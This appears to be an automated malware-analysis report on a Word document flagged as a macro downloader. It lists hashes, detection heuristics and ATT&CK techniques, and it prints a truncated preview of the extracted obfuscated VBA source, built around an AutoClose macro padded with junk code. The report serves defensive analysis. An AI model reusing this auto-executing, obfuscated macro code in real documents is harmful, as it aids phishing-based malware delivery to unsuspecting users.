Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d75ac458dae898ed…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 241.0 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: 6cc972c56cff6526c76bd44743cd8768
SHA-1: 74d88f683f67b691941064a75286ba8b972f965f
SHA-256: d75ac458dae898ed59f5140e2a31b9154acd7e8d5387c95453080bce8073ed1e
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

ClamAV identifies the sample as malicious with the signature 'Doc.Downloader.Valyria-6595163-0'. The document contains VBA macros, including an AutoClose macro (the Auto_Close heuristic below), a common technique for running code when the document is closed rather than when it is opened, which can evade analysts and sandboxes that only watch the open event. GetObject calls inside the macro further suggest an attempt to instantiate system objects or retrieve external resources. The visible portion of the extracted script consists largely of filler (Rnd, Log, Fix and InStr calls on random-looking identifiers) with no clear URL or command, which prevents a more detailed analysis of its specific actions; the only extracted URL is an OOXML schema namespace found in the document body, not a download location. The overall pattern nevertheless indicates a downloader.

Heuristics 7

  • ClamAV: Doc.Downloader.Valyria-6595163-0 (severity: critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected (severity: medium; 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Auto_Close macro (severity: high) [OLE_VBA_AUTOCLOSE]
    Auto_Close macro
  • GetObject call (severity: high) [OLE_VBA_GETOBJ]
    GetObject call
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  69583 bytes
SHA-256: 77c2eecfe6c467e47badb36ec4357bb834f85c1650b714bc5e8f4a7dfec0644c

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub iusowawETabja()

Dim gItujavEhKYPa
gItujavEhKYPa = Rnd(136)
If gItujavEhKYPa > 58159 Then
   gItujavEhKYPa = Exp(6)
End If
QIsIcejIRObekoX = Val("89946.6") & "zisIXAaAHYsIbE"

Dim FaBaMqEbUhew
FaBaMqEbUhew = Rnd(133)
If FaBaMqEbUhew > 6599 Then
Debug.Print "FEToJGeCOF"
hYKEaIFAM = Val("87427.7") & "UQixaqIxiWEbyRik"
   FaBaMqEbUhew = Exp(3)
lUDguaobesygaSYgOG = 70113
End If
Dim JyjCateauHeCiRaXoao
JyjCateauHeCiRaXoao = Log(5)

JyjCateauHeCiRaXoao = JyjCateauHeCiRaXoao + Log(10)
End Sub
Sub AutoClose()
Dim dujAPEqAhYZARyMAQIce
For dujAPEqAhYZARyMAQIce = 6 To 12
   Dim DAraporAZeWYQWAxa
   DAraporAZeWYQWAxa = Fix(55166)
Next
Dim qYDUzmiHycIRimuFi
qYDUzmiHycIRimuFi = Log(2)

qYDUzmiHycIRimuFi = qYDUzmiHycIRimuFi + Log(10)
Dim wkARUGYlIlydECeiEQAl
wkARUGYlIlydECeiEQAl = Rnd(1110)
If wkARUGYlIlydECeiEQAl > 22082 Then
nAioDTOLOj = 19744
Dim keKeiEwikEdI
For keKeiEwikEdI = 9 To 12
   Dim ZuBElogIrOQUVRe
   ZuBElogIrOQUVRe = Fix(69234)
Next
   wkARUGYlIlydECeiEQAl = Exp(10)
End If
iUHAGatOzH = 62980
On Error Resume Next

Dim PivoHEjCON
PivoHEjCON = Rnd(1110)
If PivoHEjCON > 80599 Then
   PivoHEjCON = Exp(10)
End If
GyfiaoWYBOvYpiMaTEqItAz = 99525

Dim cUhaWuwOSyQKulECYwizamO
For cUhaWuwOSyQKulECYwizamO = 3 To 11
   Dim bYhYnOqylygyCEMYqaKoZI
   bYhYnOqylygyCEMYqaKoZI = Fix(61927)
Next
dIxoQeTUrFifuLiGUWydOB = InStr("jOXanoPaLytucuaiNiveWy", "jOXanoPaLytucuaiNiveWyjOXanoPaLytucuaiNiveWy")
Dim seJuPUbEpiY
Debug.Print "boVICUsAGfOloJytOL"
For seJuPUbEpiY = 7 To 11
   Dim xEBnhiwURErave
   xEBnhiwURErave = Fix(71043)
Dim PiPYHuNaqAREK
For PiPYHuNaqAREK = 2 To 10
   Dim NYJuKoPuvoki
   NYJuKoPuvoki = Fix(91724)
Next
Next
TeAhipaGoJeMeDyiY = ""
Debug.Print "jymUXocuaOlaMUiUROTEty"
Dim TuBadiaOVenaXUROMYJon
TuBadiaOVenaXUROMYJon = Log(5)

TuBadiaOVenaXUROMYJon = TuBadiaOVenaXUROMYJon + Log(11)
Dim QaSIHADOWOhYrEDegAcYWY
Dim lejIqAcwYfitavM
lejIqAcwYfitavM = Log(1)

lejIqAcwYfitavM = lejIqAcwYfitavM + Log(12)
For QaSIHADOWOhYrEDegAcYWY = 6 To 11
   Dim dtytoNOmYBU
Dim gucErOPECYmUZI
For gucErOPECYmUZI = 2 To 13
   Dim SySOwiBUQufyHyDULyVIx
   SySOwiBUQufyHyDULyVIx = Fix(74333)
Next
Dim FePoDICyrdebiDo
For FePoDICyrdebiDo = 1 To 12
   Dim JOFEvFYxEh
   JOFEvFYxEh = Fix(28819)
Next
   dtytoNOmYBU = Fix(33228)
aaKyQAVeiySaqycU = InStr("yzAlaQeXImo", "yzAlaQeXImoyzAlaQeXImo")
Next

Debug.Print "bOhYKUDYcYbufIZOHROrYv"
bacETuVOfoBEWItEcA = Val("75566.6") & "sADAjImOSINU"

 TeAhipaGoJeMeDyiY = TeAhipaGoJeMeDyiY + IIf((266 + 532) = 798, "s", "HdI")
Dim fevuCagEvYiExOtEjUH
fevuCagEvYiExOtEjUH = Log(10)

fevuCagEvYiExOtEjUH = fevuCagEvYiExOtEjUH + Log(12)
Dim BEwazaJicalUCU
CEviwYmAcOMoQijY = Val("55734.5") & "ZemoliHOcOPIcihOBOwqbY"
nuduKExGbEpoaIHofUP = 40304
BEwazaJicalUCU = Rnd(118)
KEDuquUTYqULifYKyLedAV = InStr("dUCESibyBeBeePivAP", "dUCESibyBeBeePivAPdUCESibyBeBeePivAP")
Dim iaSuxuDanAFYLUT
For iaSuxuDanAFYLUT = 10 To 10
   Dim ZAfiaOraruHE
   ZAfiaOraruHE = Fix(48875)
Next
If BEwazaJicalUCU > 53272 Then
   BEwazaJicalUCU = Exp(8)
Dim aamOmYSeTIgIFejuLE
aamOmYSeTIgIFejuLE = Rnd(137)
If aamOmYSeTIgIFejuLE > 39270 Then
   aamOmYSeTIgIFejuLE = Exp(7)
End If
End If

Dim YdIHeKHUQWEPEZyJoVy
YdIHeKHUQWEPEZyJoVy = Log(7)
FAzYDAqUtikYg = InStr("TogOSytuHuPOjavAmAL", "TogOSytuHuPOjavAmALTogOSytuHuPOjavAmAL")
Dim iiQOleiuQaDusagOBuXa
iiQOleiuQaDusagOBuXa = Log(6)

iiQOleiuQaDusagOBuXa = iiQOleiuQaDusagOBuXa + Log(10)

YdIHeKHUQWEPEZyJoVy = YdIHeKHUQWEPEZyJoVy + Log(10)
Dim MOvyWudUcILezuqitoVIYG
lONOQAVevefeDuMe = Val("70412.10") & "psYboBejYvyt"
Dim nwABoFEYrugiFoTalYwuiU
nwABoFEYrugiFoTalYwuiU = Log(3)

nwABoFEYrugiFoTalYwuiU = nwABoFEYrugiFoTalYwuiU + Log(13)
For MOvyWudUcILezuqitoVIYG = 1 To 11
Debug.Print "WIxIBeoF
... (truncated)